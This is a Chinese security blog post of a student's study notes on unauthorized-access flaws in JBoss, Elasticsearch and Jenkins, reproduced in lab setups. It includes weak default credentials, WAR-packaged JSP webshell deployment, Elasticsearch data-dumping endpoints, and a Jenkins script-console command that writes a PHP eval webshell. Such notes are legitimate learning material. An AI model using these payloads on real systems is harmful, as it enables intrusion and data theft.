开冲
- 关注
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9

前言
之前学姐他们面试问到了中间件,吓得我赶紧学习学习中间件相关知识点,学习内容较浅,也请各位师傅帮我补充补充,纠正文章错误,一起学习!
中间件
中间件是软件,作用于系统软件和应用软件之间,软件各部件之间,管理着客户机与系统软件之间的计算资源和网络通信,为应用软件服务,应用软件为最终用户服务,最终用户并不直接使用中间件。
工具开发出来就是为了便捷。
jboss未授权访问
介绍
jboss存在未授权访问,通过该漏洞,可以后台管理服务,脚本命令执行系统命令,如反弹shell,wget写webshell文件。
可以通过未授权访问控制台。
弱口令如下:
admin/admin
admin/123456
利用应用部署war包,war里面可以放置jsp包,可以利用jsp包实现webshell写文件,反弹shell。
war制作
jar cvf shell.war shell.jsp
jsp为你准备的木马条件,war应用文件。
环境搭建
漏洞环境:vulhub上的CVE-2017-7504
进入到CVE-2017-7504目录执行docker-compose up -d
部署文件
找到上传位置:
上传war,
用kali的远程服务器部署,
在var/www/html目录放入war包。
打开http服务:service apache2 start
访问:http:ip/部署的war前缀,如shell.war可写shell
看到了shell.jsp,可以拿出冰蝎。
Elasticsearch未授权
介绍
基于java开发的企业级搜索服务,提供分布式多用户的全文搜索引擎。 启动此服务默认会开放9200端口,可被非法操作数据。
当节点启动,会利用多播或单播寻找集群中的其他节点,并建立连接。默认开启9200端口,黑客就可以搜索信息。
相当于一个API,任何人访问这个地址,就可以调用api,进行数据的增删改操作。
http://x.x.x.x:9200/_nodes
漏洞测试
下载该软件,安装。
安装错误:
以记事本形式打开config目录下的jvm.options文件,将:
-XX:+UseConcMarkSweepGC
-XX:CMSInitiatingOccupancyFraction=75
-XX:+UseCMSInitiatingOccupancyOnly
修改为:
#-XX:+UseConcMarkSweepGC
#-XX:CMSInitiatingOccupancyFraction=75
#-XX:+UseCMSInitiatingOccupancyOnly
可以浏览器搜索网段
localhost:9200
http://ip:9200/_cat/indices获取所有的index
http://ip:9200/_mapping?pretty=true获取index下的所有的type
检测脚本
#! /usr/bin/env python
# _*_ coding:utf-8 _*_import requests
def Elasticsearch_check(ip, port=9200, timeout=5):
try:
url = "http://"+ip+":"+str(port)+"/_cat"
response = requests.get(url)
except:
pass
if "/_cat/master" in response.content:
print '[+] Elasticsearch Unauthorized: ' +ip+':'+str(port)
漏洞测试
http://ip:9200/pv_fun_all/school/_search?pretty=true 获取该index下该type下的内容
http://localhost:9200/_cat/indices
http://localhost:9200/_river/_search 查看数据库敏感信息
http://localhost:9200/_nodes 查看节点数据如有安装head插件:
http://localhost:9200/_plugin/head/ web管理界面
jenkins未授权访问
介绍
Jenkins是一个开源软件项目,是基于Java开发的一种持续集成工具,用于监控持续重复的工作,旨在提供一个开放易用的软件平台,使软件项目可以进行持续集成。
未授权访问管理控制台,可以通过脚本命令行执行系统命令。通过该漏洞,可以后台管理服务,通过脚本命令行功能执行系统命令,如反弹shell,wget写webshell文件。
默认端口为8080
漏洞复现
安装jenkins
链接:https://pan.baidu.com/s/1PzUlSp7Cw82x6zVsvpI6FA
提取码:9528
下载成功,运行后任务管理器开启jenkins服务。
然后再浏览器输入http://localhost:8080
找到脚本命令行,输入
println "whoami".execute().text
上传webshell
new File("D:\\phpstudy_pro\\WWW\\ma.php").write('<?php @eval($_POST[cmd]);?>');
蚁剑连接,成功。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)